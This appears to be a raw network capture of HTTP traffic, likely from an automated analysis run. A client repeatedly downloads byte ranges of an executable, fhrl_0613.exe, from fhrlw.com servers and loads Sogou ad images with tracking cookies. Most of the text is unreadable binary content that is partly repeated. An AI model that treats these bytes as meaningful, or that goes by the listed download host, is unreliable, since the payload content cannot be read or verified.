Content-Range: bytes 1433600-1638400/2427616

Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT

Accept-Ranges: bytes

ETag: "b50867ae386cf1:4b5"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:00:15 GMT

.QvF2_.c.^a......9Bs..u.r....t.r.f.a:.c%!<.........I4b....uH!n.....Q<...i.....U..o.....R.....g....G.S....Kox.F2.e.PqR..e..W...E...Z.a.......k... .R...q..a4....y..-.. ..ir....R......i.7...9...G....g.M!j.O.....F.u1...K_.b..S.61..~.....O.w.-..'N.J.(y,..>........>...-.U.m. ...U...b,W......Q.}.k.}x..r...{......r[<...n...JKO.s..J?|.*.<./]xx.R.g.r...9.y...P.n....#f.b...vC..e..w.u.......H.cy)K.tl..@...b..F.H....7......o.9...Eb...xz.hm;.4.gict..ji....s..;.....A.O"....Yl.\s1/...Y....k.o.sZ@~.'.N..I.b..=..%a....%..........!.S$..p.C91t?..VO.).|.......vZ.....3.3.....rQW.v.......@...ywJU..T.....7_..~,.bA2.....W.i..H!..........T....m../Czz*Q.e......A.........!.fC........79.b.../....#....^.....{.:.'..vo..j...{.......>..e..Z..R5..<.UY...$R\....m%do....;..f...X....@.....-.O..)(z.|..jC..|. .bXL..k.O ..`.A..L...{.fIZ...V">d1........vU..kb.7....h.$d.@.E8mek.S...=4..%.suDN.-..}Kj.qn-/._..n..;}W...Z.X.16oPk.....pK. ...KK...<...../.$.qt.......7.."C...i.k .C../.e^.8...P}.p......s...."...B......M.......{...._.....c.j.A..*.g.*.....-{.......}......0.J.....@O.,.w.X.y<i...W........R8.TX.M}3.."..V..T..}..U..9.t%.z.......1.H..n/.5O..,..1..a..".y..t.=J.Y....,..c..=..q.Bxyb}8..I.u.[V....s...........)o......DFn,...j..g..r.kd....I.........cls.YN.....7...X.#......<E^.d..[.....>g;.......b..qS2..>z[.....|.)!...H.......0.D.*^M#TF..;.......i.#...w....Ddh.0jbS.xx.dp:...&9.=..7..2.:.L#.l....L.L...{..... ".$-..]...M.....I...v7....i..n.. .KH>.."...._.$)_.V.9..=...*.T"....Z<d..N...bR_.m.`f-e...6Jc.....Ok...5

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=1228800-1433600

Host: dl1.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 204801

Content-Type: application/octet-stream

Content-Range: bytes 1228800-1433600/2427616

Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT

Accept-Ranges: bytes

ETag: "6a985288e386cf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:00:57 GMT

..fw.....H.rA. ^.wr(@.:?/[.......HO2Y[........s...jXQ~......66.B.r.....zO.....W9..\m.....D....u|BC0^....K....(.)E;....J(.B...krK....6..................W..4...e.j....q)M#$.~..B5...DS..0H....h:..,.S?.........4..tW...;.....q..<. ....%.=.mB...j..M^H......... ..C.....Y.`...`!..........%...X..j.H. !rOI3.......2...pO.}(....<g.^0.'Ch.O..d......12q.t..V.O<.......x.......WP..bW..cV..?l_X.^..0.1.&.... .B.9..@.B...k...............h" .mZ........,}9...j..J.....^.....xjU....#..l....%n|.....g......_UT2.{..........y..U7.......^'..X!....XH /.x....lJ.:..4..J...j..{N.G1.....K..6.O.'Z........r.YXY.j.<kK.'...[...SG..hw.,/..L.m=...T....$i....C.T..c!?.V)dU..3..62..1L...SE>V..4#......x......3.......R.'...v....2.?.^.s.Df........Sr..G..........C.Ad.-~.bS..!{V..g.,..:.....>.D.......o.J...z.&.(.......*..}V.......-...l$R..*|..Ja.n........j...."............)..../7...[..9..aEC.....Z...H."..........A........|..O{R............G).!-..../....#[?..I].=Y4A.W..s D-..qe.3.....#...C.nW..M..).V.8>;.0.".[:...IO.cI.z.."..u.C.l&..~Y..d.t.|[S.......(.m....F..i,....fB|.S..C7TQ<l...QQ._... .[$\{l....s:.c...3...".5......I;$..1J..u.U^~...#.....Td......z.TS......~rs.A!..1.R.u..o.r.l.q..$)...Y..~.PX......U..I(....4.....-.J.#.S.(0u.......If:....}.Q.4jT.h...qr.N=.|}./.}..k@C6. ...........e..p.......9...J.T..3.Lv.....L.x...9.....~Mh>k .BW...f..L.0V.H....|.....U.....Th*..<q.../.7C.L.& ......n}....{..?Qp.?.....s....\......1.....x.Z.......sy.x.Uogmg]t....'`.V..............gM..>.........<..k0.LN..T....9.^.V..#V..m.....kX.........V4Zz

<<

<<< skipped >>>

GET /app/a/53/48aaf3d6-f95f-4921-8a68-2606aed69a12.gif HTTP/1.1

Accept: */*

Referer: hXXp://inte.sogou.com/ct?ssi0=257&pvt=1402736450366&t2=1402736454&t1=0&bi=3&lan=en-us&ece=true&nmi=0&npl=0&eja=true&lhi=0&ccd=32&srp=1276,846&bs=336,61&lmt=1402736453&z=1872c1e9649eade9&rnd=d80ad57ae7f27b9e&ti=&refer=&sohuurl=http://client.fhrlw.com/ad/fixad.html?id=9995&if=8&fv=11&w=460&h=60&id=341269&tmp_cdif=0&m=MTQwMjczNjQ0NV9wcmV0dHkgZG9nXzM0MTI2OQA-

Accept-Language: en-us

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: img04.sogoucdn.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sat, 14 Jun 2014 09:00:48 GMT

Content-Type: image/jpeg

Transfer-Encoding: chunked

Connection: keep-alive

X-Powered-By: PHP/5.3.3

ETag: 9023c15c2b74fd70a034d1b373a42e09

Expires: Mon, 14 Jul 2014 01:04:57 GMT

Cache-Control: max-age=2592000

Last-Modified: Sat, 14 Jun 2014 01:04:57 GMT

90bc...PNG........IHDR.......<.....d\.|....pHYs...u...u..>.....MiCCPPhotoshop ICC profile..x..SwX...>..e.VB....l.."#....Y....a...@....V....HU....H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0..>.3.o..~..@...z..q.@......qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N....l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A..............a.D@.$.<.B........A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R...J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6..l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......)..k.f....t...,.......9..k.a........E..J.6.....|...M..

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=1433600-1638400

Host: dl1.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 204801

Content-Type: application/octet-stream

Content-Range: bytes 1433600-1638400/2427616

Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT

Accept-Ranges: bytes

ETag: "6a985288e386cf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:01:10 GMT

.QvF2_.c.^a......9Bs..u.r....t.r.f.a:.c%!<.........I4b....uH!n.....Q<...i.....U..o.....R.....g....G.S....Kox.F2.e.PqR..e..W...E...Z.a.......k... .R...q..a4....y..-.. ..ir....R......i.7...9...G....g.M!j.O.....F.u1...K_.b..S.61..~.....O.w.-..'N.J.(y,..>........>...-.U.m. ...U...b,W......Q.}.k.}x..r...{......r[<...n...JKO.s..J?|.*.<./]xx.R.g.r...9.y...P.n....#f.b...vC..e..w.u.......H.cy)K.tl..@...b..F.H....7......o.9...Eb...xz.hm;.4.gict..ji....s..;.....A.O"....Yl.\s1/...Y....k.o.sZ@~.'.N..I.b..=..%a....%..........!.S$..p.C91t?..VO.).|.......vZ.....3.3.....rQW.v.......@...ywJU..T.....7_..~,.bA2.....W.i..H!..........T....m../Czz*Q.e......A.........!.fC........79.b.../....#....^.....{.:.'..vo..j...{.......>..e..Z..R5..<.UY...$R\....m%do....;..f...X....@.....-.O..)(z.|..jC..|. .bXL..k.O ..`.A..L...{.fIZ...V">d1........vU..kb.7....h.$d.@.E8mek.S...=4..%.suDN.-..}Kj.qn-/._..n..;}W...Z.X.16oPk.....pK. ...KK...<...../.$.qt.......7.."C...i.k .C../.e^.8...P}.p......s...."...B......M.......{...._.....c.j.A..*.g.*.....-{.......}......0.J.....@O.,.w.X.y<i...W........R8.TX.M}3.."..V..T..}..U..9.t%.z.......1.H..n/.5O..,..1..a..".y..t.=J.Y....,..c..=..q.Bxyb}8..I.u.[V....s...........)o......DFn,...j..g..r.kd....I.........cls.YN.....7...X.#......<E^.d..[.....>g;.......b..qS2..>z[.....|.)!...H.......0.D.*^M#TF..;.......i.#...w....Ddh.0jbS.xx.dp:...&9.=..7..2.:.L#.l....L.L...{..... ".$-..]...M.....I...v7....i..n.. .KH>.."...._.$)_.V.9..=...*.T"....Z<d..N...bR_.m.`f-e...6Jc.....Ok...5

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=1433600-1638400

Host: dl1.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 204801

Content-Type: application/octet-stream

Content-Range: bytes 1433600-1638400/2427616

Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT

Accept-Ranges: bytes

ETag: "6a985288e386cf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:01:10 GMT

.QvF2_.c.^a......9Bs..u.r....t.r.f.a:.c%!<.........I4b....uH!n.....Q<...i.....U..o.....R.....g....G.S....Kox.F2.e.PqR..e..W...E...Z.a.......k... .R...q..a4....y..-.. ..ir....R......i.7...9...G....g.M!j.O.....F.u1...K_.b..S.61..~.....O.w.-..'N.J.(y,..>........>...-.U.m. ...U...b,W......Q.}.k.}x..r...{......r[<...n...JKO.s..J?|.*.<./]xx.R.g.r...9.y...P.n....#f.b...vC..e..w.u.......H.cy)K.tl..@...b..F.H....7......o.9...Eb...xz.hm;.4.gict..ji....s..;.....A.O"....Yl.\s1/...Y....k.o.sZ@~.'.N..I.b..=..%a....%..........!.S$..p.C91t?..VO.).|.......vZ.....3.3.....rQW.v.......@...ywJU..T.....7_..~,.bA2.....W.i..H!..........T....m../Czz*Q.e......A.........!.fC........79.b.../....#....^.....{.:.'..vo..j...{.......>..e..Z..R5..<.UY...$R\....m%do....;..f...X....@.....-.O..)(z.|..jC..|. .bXL..k.O ..`.A..L...{.fIZ...V">d1........vU..kb.7....h.$d.@.E8mek.S...=4..%.suDN.-..}Kj.qn-/._..n..;}W...Z.X.16oPk.....pK. ...KK...<...../.$.qt.......7.."C...i.k .C../.e^.8...P}.p......s...."...B......M.......{...._.....c.j.A..*.g.*.....-{.......}......0.J.....@O.,.w.X.y<i...W........R8.TX.M}3.."..V..T..}..U..9.t%.z.......1.H..n/.5O..,..1..a..".y..t.=J.Y....,..c..=..q.Bxyb}8..I.u.[V....s...........)o......DFn,...j..g..r.kd....I.........cls.YN.....7...X.#......<E^.d..[.....>g;.......b..qS2..>z[.....|.)!...H.......0.D.*^M#TF..;.......i.#...w....Ddh.0jbS.xx.dp:...&9.=..7..2.:.L#.l....L.L...{..... ".$-..]...M.....I...v7....i..n.. .KH>.."...._.$)_.V.9..=...*.T"....Z<d..N...bR_.m.`f-e...6Jc.....Ok...5

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=2048000-2252800

Host: dl1.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 204801

Content-Type: application/octet-stream

Content-Range: bytes 2048000-2252800/2427616

Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT

Accept-Ranges: bytes

ETag: "6a985288e386cf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:01:06 GMT

....`..m.R.@......H.8=H$.......b.".....'...6..B....E..,..S..E...r.0hns.9...t.(........!<....o....^y g.{G'......#........&;.60CD(.8......P..n...w.\........W.o... q..O.k.4T)V.....-.......X. ...H...0...(..,.vq6.r.Y...w".bF.).....-..`%...17c..U`...v.O..D...!..U..2e..........p.~j.Ck@.Q..7%.....$t5...`..A..?.,..M#.....E.....l.....yP....$...x.%..G...@U..74W...W.@..l..&.....r. .6.....TLZ.....rh......=|1.....,..J......w.........4..M.9N.\.E~=....baX.N.G.x.[...7..E.q?NmFT&..../A|U.$.....u.g&..iC...m......3......s.(R.h6.T..\g......;.w.....^....LvU.K.........4.......U*_'3..O..K.MF..L....F.w.........PNG........IHDR...1...0.....7.......pHYs................MiCCPPhotoshop ICC profile..x..SwX...>..e.VB....l.."#....Y....a...@....V....HU....H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0..>.3.o..~..@...z..q.@......qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N....l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A..............a.D@.$.<.B........A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#..

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=409600-614400

Host: dl2.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 204801

Content-Type: application/octet-stream

Content-Range: bytes 409600-614400/2427616

Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT

Accept-Ranges: bytes

ETag: "b50867ae386cf1:4b5"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:00:03 GMT

...3k......}H.FO.......<_...*M.hr@.a$>..!...&p...H........>|N.......R...,.6d....X}....).p?E.|v.d.-.b,.`.y)......B\.}Z......E&.|..x.Jl4....Fro.eR..0...a..nXU..^Ax.T. ..d.V...........=~...&...........kq.......O....O...,Hx...._@.T:.o8d.pY.......1......B../.m.Tn.T[..S.w..b..Pw"..b...../..2.oY...^.......`3....tN(.v.. .K,..C',\.S@f..<.'...h..Xz.I...`..B]f../.'ixtr...X.h...fZ..8.......)M.T.W~O.....{...9............H....Q....4h...nl'P.y.............L'_%...K.][...Ve.W........d(...1.v..u8....F...2."%.t..2....;2.\lmt..w@..h. ...N .... .q....O..Z..r.s.A..$....n..E|.l..(.mTR...p...N....G.|H=...V.xzc...n.*.._....-c.*.g.gF.X.m...@M..E".':N..Xc.=r.z.k... #...C...6.*..p..[...i.\.bQ.!...z!...K1U(@ ......0?BS.d/j...Z...b.]ph..,#..lZ...*..[c.y.....T.Y.`1...V4#.~...1*$lD....K(U{%0.."q........L......{m.Fe.r{5..._{*B.F...^.........s...9\.,.MD6UkL..H7..B= . .u.F..Sp..k......he..$..O;6.8..i.d$Fqz.#........y..u.;u..wkJG4sN^].....?.... ....y.}.....(..7.. L.s.!XJ3?}........h.`.?..]...X.^t*.M....?.. (K......dL.A... EZi.....XFTZHb....C...0g.q&.El.....9..!~..yd.sDO.........h..N.gK..|-..<.i.9.s..2.....g..8..........qx6....../.o...Y.]E..G.*a..d.#...}.AW.../.m.l.G.G.B-..!k.UX......O...*(.&.n...2.>....]...q..vp.J=M| INT..xN....O..e..%l....-w.sF].Y..~..W....{.B...i.p.....R<.....;.F.u..........1X ..v&V.....20.M.q.. w...8@. ........_........ggZ_......[-..K^B_.N.9t.g.v.....nK&."=....~,.0.M.^.r.... ..5\j....uC8.<...[..&...n....0..9.2...#..z.n...D.9.y? ....'o.]|......:.......U J..g...=...MC...Ul...3.......8...i.......-v.rBI..?.

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=2252800-2457600

Host: dl1.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 174816

Content-Type: application/octet-stream

Content-Range: bytes 2252800-2427615/2427616

Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT

Accept-Ranges: bytes

ETag: "6a985288e386cf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:01:14 GMT

...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?..t..1.f.|A...o..@...M.......k#.~..N..4.9`.x.>.l".q.........x.8...{Ze>=!s.....}./...$\9<L.p_.n..0.d....8%Y6...@.9...!"UU...6..p'.....D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db.......I....B..\x*.[:.dF..VY....$"..b.".\4..1@...30....&w......S..\.....TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9.......{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..OL...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.b...n....X;....j.X$D..}....j6..)..@..b.............?F..^...!.....*.w.T@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^<..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,.....`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.......E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A....#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.<.i......Q......... ..Y{......T.X<..9....?^7s......D#Q.Z...'..!..e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<....O.....Q8..g.%..P.Y...`.N...t.#.oh@.FiuA.........o...d=.qWD.7...x

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=2252800-2457600

Host: dl2.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 174816

Content-Type: application/octet-stream

Content-Range: bytes 2252800-2427615/2427616

Last-Modified: Fri, 13 Jun 2014 08:42:58 GMT

Accept-Ranges: bytes

ETag: "b50867ae386cf1:4b5"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:00:29 GMT

...*.....]G.......C._2u.....[.Kcf..k.....4......oZ............I.H....F.. .%.$....=;..=....D...@}A}$.k..L&.IQ2.....j.q.*.X.........Z8R.f...h?..t..1.f.|A...o..@...M.......k#.~..N..4.9`.x.>.l".q.........x.8...{Ze>=!s.....}./...$\9<L.p_.n..0.d....8%Y6...@.9...!"UU...6..p'.....D..H.T'...q;.c..$_D.......}...w..8...~34V*6.in./.0}.....CP........db.......I....B..\x*.[:.dF..VY....$"..b.".\4..1@...30....&w......S..\.....TL..v.n......b...8. T...XQ...%mk.T..h.....0...<h...)_....N...9.......{9j.....u..W.......5......V.j.n.'.%.......T...x.McY..VS....D..G..OL...:....X..(...f..f.I...(".s'..<.uk...{1. TO...7...^y.....].._@...I-_.../.F..a}..N.3...~...N..yw.....^..n.k1Xx.{.Z..'.......7.8.....I.%.b...n....X;....j.X$D..}....j6..)..@..b.............?F..^...!.....*.w.T@m..... &5L.~.-e.;.q...;.n"h.OD..t..].Fke.f.]...........[G.?..i..Y.>. ....oZ...........s.jg...&.......i.".X.....Z..'..~N... ...d...$q.^<..S.3 ...,.]..Oh0..iC.%r..v...2.Y.fLN..B._..U.....,......I..k...,.....`y~....r...f..g%..V......>wM....).}:.....f.f.7.nWg7.G.I....r.......E.......)Z'9.o.c....."S.K..3M<,.w*^....E2...uIQ.K=..9..k....]p..9.a....7d.<.d#.`.k....k...;...=0.{\96b...(...|dmTk..`HkG$p..-}wH.A....#,.GhE.t...-I.$....0A;p.....Z/6d....O....>.%z.f.H.?........n...f.......S.rJ...U.I.=.l"..8<......Y..Q.....y...]r.M`VI..n.B.K.G.-..JX.<.i......Q......... ..Y{......T.X<..9....?^7s......D#Q.Z...'..!..e..S....iD....U}.....4....[V.x?.m.........>b.nRy....'8TXF.U.<....O.....Q8..g.%..P.Y...`.N...t.#.oh@.FiuA.........o...d=.qWD.7...x

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=819200-1024000

Host: dl1.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 204801

Content-Type: application/octet-stream

Content-Range: bytes 819200-1024000/2427616

Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT

Accept-Ranges: bytes

ETag: "6a985288e386cf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:00:53 GMT

.qb.........d>...Kcp..)`.`.j..X3y4Ei3..|$7.....xN.-/.0:.;.U.........p......z......L.,.....|..=..3.....Cca^:..;.....'.])....!........%O.Y..M.DjK...8.[..QY.G............X.....:Gzc...tv...yu...,3k....Sc.(..hK...b..V..q..e...)./p..O....Q.h.......](....V.....L.T.F..\.8}..J.6SB.0.....U.R..z9`I...[....{.1.`cB.n.c7US...&s..N..Fl.%.?&..........Z....VCr..d.1 #=<.,.Ir.a.c......N..u%4..|m.I;R.}.......?..!!x....i&.3....X4a*........F.........W.h.U....Mv0In..^.........a...Q3...$..z..i..W...nVt...."p..$.......L.:.V..b...)..*.....\.@4..|....F... .....].?.6r...rF%a.c*>@*..vUp[..._.I...;.....]...>.N..I..f.....`.wcW..6..9Yp..#..!.l.k....d..........e..4..!.....n.X.tS.|.A.lW.].`k.6. ~3/6/.[h"w..8..U.#._......p....A...R.....g.6.-..Qrm..g.....4{.-.$...u?U....9......k...n....|.;E....(.>.1Z.\...f8l.n..u2..)....|...E....S.)(...#.....mX.HQ..z.......Qh-Z..)S).T...([...[{Z(..t.;.a.b...2..............Y..IK .........[guE........`|...[...............Z.x@.Z...AY..a.H>N..LKD...!..&jc..m....`...V3.hB....m...M...J....x..=ehO#.H..HC.._.?...N ...YwP.93.....,.R6..;...=...{C..m.y4...u.h.......>.{n.....c(...0...r.".KzpR..c.....0n.....7L^6.j...O....:.K>..!O..".K....x.c.....f.....w[.-....lO83.X.. ....P...)..v.C.......v..G.B.... ..........u.5.&....e....Z..y.OncN....!,aJ.{.....".....<3.;....Y..W......?...C!........c,.B.0...(s.x..B.Jb~.7....a.X.......MW.:.X%.y^.@Z..!$:.uG.".Q...`.^<.1.....|.uF...O..LazL...TUUY..<d.Q?q...E.y..n...N.%...!.*..a...n6./k.J.M./)....Lb......&U:o._.h..f.x..vL......fo=.{v@..Asxx7..^..$.:........?Z...

<<

<<< skipped >>>

GET /testgpimg/sogou_icon_short.png HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)

Host: p.inte.sogou.com

Connection: Keep-Alive

Cookie: CXID=700CE21EAACC6D2CC6014D4926FB9AE8; SUID=E7F48AC12141900A539C0F3B000F06DC; ad=KLpiSyllll2FXlDElllllVntR8ZlllllZYr1iZllllwlllllRklll5@@@@@@@@@@

HTTP/1.1 200 OK

Server: nginx/1.4.1

Date: Sat, 14 Jun 2014 09:00:45 GMT

Content-Type: image/png

Content-Length: 3528

Connection: keep-alive

Last-Modified: Wed, 23 Jan 2013 07:16:05 GMT

Expires: Sat, 14 Jun 2014 12:44:54 GMT

Cache-Control: max-age=86400

Accept-Ranges: bytes

.PNG........IHDR.............2..5....pHYs................MiCCPPhotoshop ICC profile..x..SwX...>..e.VB....l.."#....Y....a...@....V....HU....H....(.gA..Z.U\8.....}z............y.....&...j.9R.<:...OH......H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>..................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0...._p..H.......K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l.....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0..>.3.o..~..@...z..q.@......qanv.R....B1n..#......)..4.\,...X..P"M.y.R.D!......2......w....O.N....l.~.....X.v.@~.-......g42y.......@ ...........\...L....D..*.A..............a.D@.$.<.B........A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ...Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@.......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$....N.!%.2I.IkH.H-.S.>..i.L&..m....... ......O.......:...L..$R...J5e?....2B...Q.......:.ZIm.vP/S...4u.%...C..-....igi.h/.t.....E....k.......w......Hb(.k.{...../.L......T0.2..g...oUX*.*|.....:.V.~...TUsU?.y..T.U..^V}.FU.P.........U..6..RwR.P.Q_.._...c....F..H.Tc....!..2e.XB.rV..,k.Mb[...Lv...v/{LSCs.f.f.f..q.......9..J.!...{-.-?-..j.f.~.7.z...b.r......up.@.,..:m:.u..6.Q....u..>.c.y.........G.m..........704.6..l18c...c.k.i........h...h..I.'.&..g.5x.>f.o.b.4.e.k<abi2.......)..k.f....t...,.......9..k.a........E..J.6.....|...M....V>VyV.V

<<

<<< skipped >>>

GET /fhrl/fhrl_0613.exe HTTP/1.1

Accept: */*

User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)

Range: bytes=1024000-1228800

Host: dl1.fhrlw.com

Cache-Control: no-cache

HTTP/1.1 206 Partial Content

Content-Length: 204801

Content-Type: application/octet-stream

Content-Range: bytes 1024000-1228800/2427616

Last-Modified: Fri, 13 Jun 2014 08:43:21 GMT

Accept-Ranges: bytes

ETag: "6a985288e386cf1:4d6"

Server: Microsoft-IIS/6.0

X-Powered-By: ASP.NET

Date: Sat, 14 Jun 2014 09:00:57 GMT

...y.5..7.W].n.:.0.......k../6.W..YqR:...|."9...$>^..d..W.Nh.D.>.$s..ORJ.M..kA...-....P.^.Fu.........|.__u{..~......U.JZ..N.c.i..&..'t..n.,9..b.h.f{P..}....E..c)........T%A.`.....T...5.......Ei....[.....s..?...M.L.).....1......gjI0.=...Sz...;..H.S.o. 0'............~.%..&..n..F..%..R...).x....E..5....Vw.......3;j<{7.5.F.....kT..F.....M....^...V.q......3.{.yXV.;..y.?..r. 4"......!3J.......,~.M{.....{.....O...f.....M.9M%..~LY..3H.S..R.i[FN..)...P..8{].w....@-.pP!.aOE.....N E..c.x%.2f..C.|....".b|..55........D.E........w.`$.`~5...A..3.5..9r..o..4._7.v.....x.T..(.(.\.4...".......t.......t...V..<...6u..h@.NiQ......O....'......Q...7.7M......6....p...8.{6T^"....B$...........S?..1.V....x.l..j.q19...w..O....;y!Q....H..M)qn.o...&......=.tQ...$:.......)...|.b..u)|...g....{..Z.....C..$.zd....&.4... ..?!!..6.4,.?... 